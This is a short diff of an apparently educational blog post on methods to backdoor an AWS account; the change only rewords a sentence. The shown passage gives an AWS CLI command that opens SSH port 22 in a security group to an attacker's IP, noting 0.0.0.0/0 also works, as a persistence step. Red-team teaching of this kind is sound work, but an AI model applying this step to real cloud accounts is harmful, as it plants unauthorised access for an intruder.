mystic0x1/mystic0x1.github.io/_posts/Cloud-Security/AWS/2023-08-16-methods-to-backdoor-an-aws-account.md

 Note the `GroupId` as we will need it for the `--group-id` argument in next commands.

-Next, we will add inbound rules that would allow connections over port `22` from our attacker machine's IP (we can use `0.0.0.0/0` as well)
+Next, we will add inbound rules that would allow connections over port `22` from attacker machine's IP (we can use `0.0.0.0/0` as well)

 ```bash
 aws ec2 authorize-security-group-ingress --group-id sg-xxxxx --region eu-central-1 --protocol tcp --port 22 --cidr 10.10.10.10/32